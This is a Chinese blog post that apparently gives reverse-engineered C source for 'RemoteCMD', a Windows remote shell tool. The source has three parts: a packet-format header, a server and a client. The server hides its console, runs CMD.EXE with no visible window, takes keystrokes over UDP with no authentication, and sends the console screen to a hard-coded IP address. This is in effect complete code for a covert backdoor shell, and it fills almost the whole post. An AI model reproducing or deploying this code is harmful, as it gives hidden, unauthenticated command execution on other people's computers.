查看文章
 
同步SHELL逆向源码
2009-02-20 23:25

保存在这里免得冒得了,07年末的,至今逆向能力不见增长,人变懒了

/*
*   www.lovemfc.com
*-----------------
*    pack.h
* 数据包
*------------------   
*/

#define KEY_SREEN   0x1002
#define KEY_NO_CTRL   0x1003
#define KEY_CTRL_C   0x1004
#define KEY_CTRL_BRAK 0x1005


typedef struct head{
DWORD packHead;   //0x12345678
DWORD packType; // 0x1002   0x1003   0x1004   0x1005
DWORD SreenBufferSize; //包大小
DWORD var_10004; //0x0
}HEAD;
//16字节

typedef struct key_info{
HEAD packhead;
INPUT_RECORD Key; //20
}KEY_INFO;

typedef struct console_buffer{   
UINT wCodePageID;
DWORD Unkown1;   //'\0'
DWORD Unkown2; //'\0'
CONSOLE_SCREEN_BUFFER_INFO csb; //22字节   
UCHAR Character[8000];
WORD Attribute[8001];
}CONSOLE_BUFFER;

typedef struct sreen_info{
HEAD packhead; //16   
CONSOLE_BUFFER consoleBuffer;
}SREEN_INFO;

----------------------------------------------------------------------------------------------------------------------------------

/*
*   www.lovemfc.com
*-----------------
* SERVER.CPP
* 服务端,RemoteCMDS.exe 的逆向源码
*------------------   
*/

#define _WIN32_WINNT 0x0500

#include <winsock2.h>
#include "pack.h"
#pragma comment (lib,"ws2_32.lib")


BOOL WINAPI HandlerRoutine(DWORD dwCtrlType);
BOOL RecvKeyInfo();
void SendSreenBuffer( int type , CONSOLE_BUFFER *buffer , int u_size);


SOCKET   hsocket = 0;
DWORD cout = 0;
HANDLE hConsoleOutput = 0;

int APIENTRY WinMain(HINSTANCE hInstance,
                     HINSTANCE hPrevInstance,
                     LPSTR     lpCmdLine,
                     int       nCmdShow)
{
WSADATA lpWsaData;

struct sockaddr_in bindSockaddr;

SECURITY_ATTRIBUTES safe_attrib;

STARTUPINFO lpStartupInfo;

PROCESS_INFORMATION lpProcessInformation;


u_long argit;

u_short UdpPort;


COORD dwSize;

HANDLE MutexClient = CreateMutex( NULL,FALSE,"RemoteCMDS" );
if (GetLastError()==ERROR_ALREADY_EXISTS)
{
    MessageBox( 0,"RemoteCMDS has running...",NULL,MB_OK );
    return 0;
}

if( WSAStartup( MAKEWORD(1,1), &lpWsaData ) )
{
    MessageBox( 0,"WSAStartup fail...",NULL,MB_OK );
    CloseHandle( MutexClient );
    return 0;
}


hsocket = socket( AF_INET, SOCK_DGRAM , 0);
if ( hsocket == INVALID_SOCKET )
{
    MessageBox( 0,"create socket handle fail...",NULL,MB_OK );
    CloseHandle( MutexClient );
    WSACleanup();
    return 0;
}

argit = 1;

if( ioctlsocket( hsocket , FIONBIO , &argit ) )
{
    MessageBox( 0,"ioctlsocket fail...",NULL,MB_OK );
    CloseHandle( MutexClient );
    closesocket( hsocket );
    WSACleanup();
    return 0;
}

UdpPort = htons(8124);

bindSockaddr.sin_family = AF_INET;
bindSockaddr.sin_port = UdpPort;
bindSockaddr.sin_addr.s_addr = INADDR_ANY;


if( SOCKET_ERROR == bind( hsocket ,(const struct sockaddr *)&bindSockaddr , sizeof(bindSockaddr) ) )
{
    MessageBox( 0,"Bind RemoteCMD port fail...",NULL,MB_OK );
    CloseHandle( MutexClient );
    closesocket( hsocket );
    WSACleanup();
    return 0;
}



AllocConsole();


ShowWindow( GetConsoleWindow(), SW_HIDE );


SetConsoleCtrlHandler( HandlerRoutine,TRUE );

safe_attrib.nLength = sizeof(SECURITY_ATTRIBUTES);
safe_attrib.lpSecurityDescriptor = NULL;
safe_attrib.bInheritHandle = TRUE;

hConsoleOutput = CreateConsoleScreenBuffer( GENERIC_READ|GENERIC_WRITE,
         FILE_SHARE_READ|FILE_SHARE_WRITE,
         &safe_attrib,
         CONSOLE_TEXTMODE_BUFFER,
         NULL);
if (hConsoleOutput == INVALID_HANDLE_VALUE)
{
    CloseHandle( MutexClient );
    closesocket( hsocket );
    WSACleanup();
    return 0;
}

dwSize.X = 80 ;
dwSize.Y = 100;

SetConsoleScreenBufferSize( hConsoleOutput , dwSize );

SetConsoleActiveScreenBuffer( hConsoleOutput );


//GetStartupInfo (lpStartupInfo);
memset((void *)&lpStartupInfo, 0, sizeof(STARTUPINFO));

lpStartupInfo.cb = sizeof(STARTUPINFO);
lpStartupInfo.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW;
lpStartupInfo.wShowWindow = SW_HIDE;
lpStartupInfo.hStdError = hConsoleOutput;
lpStartupInfo.hStdOutput = hConsoleOutput;
lpStartupInfo.hStdInput = GetStdHandle( STD_INPUT_HANDLE );

while (TRUE)
{

   if(!CreateProcess(0 ,"CMD.EXE", 0 ,0 , 0 , 0 , 0 , 0 , &lpStartupInfo , &lpProcessInformation ) )
   {
     MessageBox( 0,"create shell fail",NULL,MB_OK );
     CloseHandle( MutexClient );
     CloseHandle( hConsoleOutput );
     closesocket( hsocket );
     WSACleanup();
     return 0;
   }

   while (RecvKeyInfo())
   {
    if( WAIT_TIMEOUT != WaitForSingleObject( lpProcessInformation.hProcess , 100 ) )
    {
     break;
    }
   }

   TerminateProcess( lpProcessInformation.hProcess ,0 );

   CloseHandle( lpProcessInformation.hProcess );
  
   CloseHandle( lpProcessInformation.hThread );
}
return 0;
}

BOOL WINAPI HandlerRoutine(
DWORD dwCtrlType
)
{
//code

switch( dwCtrlType)
{
case CTRL_C_EVENT:
   break;
case CTRL_BREAK_EVENT:
   break;
default:
   return FALSE;
}
return TRUE;
}


BOOL RecvKeyInfo()
{
DWORD NumberOfCharsRead;
struct sockaddr fromSockaddr;
COORD dwReadCoord;
KEY_INFO buffer;
CONSOLE_BUFFER sendBuffer;

int fromlen = sizeof(fromSockaddr);

if(0 <= recvfrom( hsocket, (PCHAR)(&buffer) , sizeof(KEY_INFO) , 0 , &fromSockaddr, &fromlen ) )
{
   switch( buffer.packhead.packType )
   {
   case KEY_NO_CTRL:
    WriteConsoleInput( GetStdHandle(STD_INPUT_HANDLE) ,&buffer.Key , 1 , &NumberOfCharsRead );
    break;
   case KEY_CTRL_C:
    GenerateConsoleCtrlEvent( CTRL_C_EVENT , NULL );
    break;
   case KEY_CTRL_BRAK:
    GenerateConsoleCtrlEvent( CTRL_BREAK_EVENT , NULL);
    break;
   default:
    if( ( GetTickCount() - cout) > 1000 )
    {
     return TRUE;
    }else{
     cout = GetTickCount();
    }
    break;
   }
}
GetLastError();
dwReadCoord.X = 0;
dwReadCoord.Y = 0;

memset(&sendBuffer.Character , 0x20202020 , 8000);

sendBuffer.wCodePageID = GetConsoleOutputCP();

ReadConsoleOutputAttribute( hConsoleOutput ,(WORD *)&sendBuffer.Attribute , 8000 , dwReadCoord , &NumberOfCharsRead);

ReadConsoleOutputCharacter( hConsoleOutput , (PCHAR)&sendBuffer.Character , 8000 , dwReadCoord , &NumberOfCharsRead);

GetConsoleScreenBufferInfo ( hConsoleOutput , &sendBuffer.csb);

SendSreenBuffer( KEY_SREEN , &sendBuffer , sizeof(CONSOLE_BUFFER));

return TRUE;

}

void SendSreenBuffer( int type , CONSOLE_BUFFER *buffer , int u_size)
{
struct sockaddr_in to;
SREEN_INFO sendBuffer;

memcpy( &sendBuffer.consoleBuffer , buffer , u_size);

sendBuffer.packhead.packHead = 0x12345678;
sendBuffer.packhead.packType = type;
sendBuffer.packhead.SreenBufferSize = u_size;
sendBuffer.packhead.var_10004   = NULL;
sendBuffer.consoleBuffer.Unkown1 = NULL;
sendBuffer.consoleBuffer.Unkown2 = NULL;

to.sin_port = htons(8123);
to.sin_family = AF_INET;
to.sin_addr.s_addr = inet_addr("192.168.0.100");
sendto( hsocket , (const char *)&sendBuffer ,sizeof(SREEN_INFO) , 0 , (const struct sockaddr *)&to , sizeof(to) );

}

----------------------------------------------------------------------------------------------------------------------------------

/*
*   www.lovemfc.com
*-----------------
*
* 客户端, RemoteCMD.exe 的逆向源码
*------------------   
*/


#include <winsock2.h>
#include "pack.h"
#pragma comment (lib,"ws2_32.lib")

BOOL WINAPI HandlerRoutine(   DWORD dwCtrlType );
BOOL RecvSreen();
BOOL KeyboardEvent( DWORD dwMilliseconds);
void SendKeyInfo( int type , PINPUT_RECORD buffer , int u_size);

//全局

SOCKET hsocket = 0;

HANDLE hConsoleOutput = 0;

COORD dwSize;

PINPUT_RECORD Ctrl_NULL;

struct sockaddr toSockaddr;

UCHAR cmdBuffer[6001] = {0};


void main()
{
WSADATA lpWsaData;

u_short UdpPort;
u_long argit;

struct sockaddr_in bindSockaddr;

SECURITY_ATTRIBUTES safe_attrib;

HANDLE MutexClient = CreateMutex( NULL,FALSE,"RemoteCMD" );
if (GetLastError()==ERROR_ALREADY_EXISTS)
{
    MessageBox( 0,"RemoteCMD has running...",NULL,MB_OK );
    return;
}

if( WSAStartup( MAKEWORD(1,1), &lpWsaData ) )
{
    MessageBox( 0,"WSAStartup fail...",NULL,MB_OK );
    CloseHandle( MutexClient );
    return;
}

hsocket = socket( AF_INET, SOCK_DGRAM , 0);
if ( hsocket == INVALID_SOCKET )
{
    MessageBox( 0,"create socket handle fail...",NULL,MB_OK );
    CloseHandle( MutexClient );
    WSACleanup();
    return;
}
argit = 1;

if( ioctlsocket( hsocket , FIONBIO , &argit ) )
{
    MessageBox( 0,"ioctlsocket fail...",NULL,MB_OK );
    CloseHandle( MutexClient );
    closesocket( hsocket );
    WSACleanup();
    return;
}

UdpPort = htons(8123);

bindSockaddr.sin_family = AF_INET;
bindSockaddr.sin_port = UdpPort;
bindSockaddr.sin_addr.s_addr = INADDR_ANY;


if( SOCKET_ERROR==bind( hsocket ,(const struct sockaddr *)&bindSockaddr , sizeof(bindSockaddr) ) )
{
    MessageBox( 0,"Bind RemoteCMD port fail...",NULL,MB_OK );
    CloseHandle( MutexClient );
    closesocket( hsocket );
    WSACleanup();
    return;
}

SetConsoleCtrlHandler( HandlerRoutine,TRUE );

SetConsoleTitle("RemoteCMD V1.0 coder by lovemfc.cn QQ:343789385!");

safe_attrib.nLength = sizeof(SECURITY_ATTRIBUTES);
safe_attrib.lpSecurityDescriptor = NULL;
safe_attrib.bInheritHandle = TRUE;

hConsoleOutput = CreateConsoleScreenBuffer( GENERIC_READ|GENERIC_WRITE,
         FILE_SHARE_READ|FILE_SHARE_WRITE,
         &safe_attrib,
         CONSOLE_TEXTMODE_BUFFER,
         NULL);
if (hConsoleOutput == INVALID_HANDLE_VALUE)
{
    CloseHandle( MutexClient );
    closesocket( hsocket );
    WSACleanup();
    return;
}

dwSize.X = 80;
dwSize.Y = 100;

SetConsoleScreenBufferSize( hConsoleOutput , dwSize );

SetConsoleActiveScreenBuffer( hConsoleOutput );

while( RecvSreen() )
{
   if (!KeyboardEvent( 100 ) )
   {
    break;
   }
}

SetConsoleCtrlHandler( HandlerRoutine , FALSE );

CloseHandle( MutexClient );

closesocket( hsocket );

WSACleanup();

return;
}

BOOL RecvSreen()
{
DWORD fromlen = sizeof(toSockaddr);
DWORD NumberOfcharsWriten;
COORD dwWriteCoord;
SREEN_INFO buffer;

if( 16 > recvfrom( hsocket, (PCHAR)(&buffer) , sizeof(SREEN_INFO) , 0 , &toSockaddr, &fromlen ) )
{
   return TRUE;
}
if ( buffer.packhead.packType != KEY_SREEN)
{
   return TRUE;
}
if ( buffer.packhead.SreenBufferSize != 24036)
{
   return TRUE;
}
if( !memcmp( &buffer.consoleBuffer.wCodePageID , &cmdBuffer , 6000) )
{
   return TRUE;
}

dwWriteCoord.X = 0;
dwWriteCoord.Y = 0;

WriteConsoleOutputAttribute( hConsoleOutput , (const WORD *)(&buffer.consoleBuffer.Attribute), 8000 , dwWriteCoord , &NumberOfcharsWriten);

WriteConsoleOutputCharacter( hConsoleOutput , (const char *)(&buffer.consoleBuffer.Character), 8000 , dwWriteCoord , &NumberOfcharsWriten);

SetConsoleScreenBufferSize( hConsoleOutput , buffer.consoleBuffer.csb.dwSize );

SetConsoleCursorPosition( hConsoleOutput , buffer.consoleBuffer.csb.dwCursorPosition);

SetConsoleOutputCP( buffer.consoleBuffer.wCodePageID );
memcpy( &cmdBuffer , &buffer.consoleBuffer , 6000);
return TRUE;
}

BOOL KeyboardEvent( DWORD dwMilliseconds)
{
INPUT_RECORD Buffer;
DWORD NumberOfEventsRead;
HANDLE input;

input = GetStdHandle( STD_INPUT_HANDLE );

if( WAIT_OBJECT_0 == WaitForSingleObject( input , dwMilliseconds ) )
{
   if( ReadConsoleInput( input , &Buffer , 1 , &NumberOfEventsRead))
   {
    if ( Buffer.EventType == KEY_EVENT )
    {
     SendKeyInfo( KEY_NO_CTRL , &Buffer , sizeof(INPUT_RECORD) );
    }
   }
}
return TRUE;
}

void SendKeyInfo( int type , PINPUT_RECORD buffer , int u_size)
{
KEY_INFO key_send;
memcpy( &key_send.Key , buffer , u_size );
key_send.packhead.packType = type;
key_send.packhead.packHead = 0x12345678;
key_send.packhead.SreenBufferSize = u_size;
if( *(DWORD *)(toSockaddr.sa_data) !=0 )
{
   sendto( hsocket , (const char *)&key_send ,sizeof(KEY_INFO) , 0 , &toSockaddr , sizeof(toSockaddr) );
}
return;
}

BOOL WINAPI HandlerRoutine(
DWORD dwCtrlType
)
{
//code
switch(dwCtrlType)
{
case CTRL_C_EVENT:
   SendKeyInfo( KEY_CTRL_C , Ctrl_NULL , 0);
   break;
case CTRL_BREAK_EVENT:
   SendKeyInfo( KEY_CTRL_BRAK , Ctrl_NULL , 0);
default:
   return FALSE;
   break;
}
return TRUE;
}


类别:Reverse Engineering||添加到搜藏 |分享到i贴吧|浏览(1472)|评论 (0)
 
最近读者:
 
网友评论:
发表评论:
姓 名:
网址或邮箱: (选填)
内 容:
     

   
帮助中心 | 空间客服 | 投诉中心 | 空间协议
©2012 Baidu